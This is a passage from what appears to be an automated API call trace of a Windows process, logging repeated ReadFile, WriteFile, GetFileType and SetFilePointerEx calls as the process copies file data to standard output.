[0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] GetFileType (hFile=0x50) returned 0x1 [0119.833] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.833] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.834] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.834] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.834] GetFileType (hFile=0x50) returned 0x1 [0119.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, 
lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.835] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.835] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.835] GetFileType (hFile=0x50) returned 0x1 [0119.835] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] GetFileType (hFile=0x50) returned 0x1 [0119.836] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.836] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.837] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.837] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, 
lpOverlapped=0x0) returned 1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.837] GetFileType (hFile=0x50) returned 0x1 [0119.837] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.838] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.838] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, 
lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] GetFileType (hFile=0x50) returned 0x1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.838] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.838] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] GetFileType (hFile=0x50) returned 0x1 [0119.839] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.839] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.839] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.839] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.839] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 
[0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.840] GetFileType (hFile=0x50) returned 0x1 [0119.840] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.841] SetFilePointerEx (in: 
hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.841] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.841] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: 
lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ed6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed6c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12edbc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12edbc*, lpNumberOfBytesWritten=0x12ddc0*=0x20, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.842] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12ddac | out: lpNewFilePointer=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=4) returned 0x58 [0119.842] ReadFile (in: hFile=0x58, lpBuffer=0x12ebdc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12ddcc, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesRead=0x12ddcc*=0x200, lpOverlapped=0x0) returned 1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.842] GetFileType (hFile=0x50) returned 0x1 [0119.842] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0119.842] WriteFile (in: hFile=0x50, lpBuffer=0x12ebdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ebdc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ec2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec2c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ec7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ec7c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12eccc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12eccc*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] GetFileType (hFile=0x50) returned 0x1 [0119.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0119.843] WriteFile (in: hFile=0x50, lpBuffer=0x12ed1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ddc0, lpOverlapped=0x0 | out: lpBuffer=0x12ed1c*, lpNumberOfBytesWritten=0x12ddc0*=0x50, lpOverlapped=0x0) returned 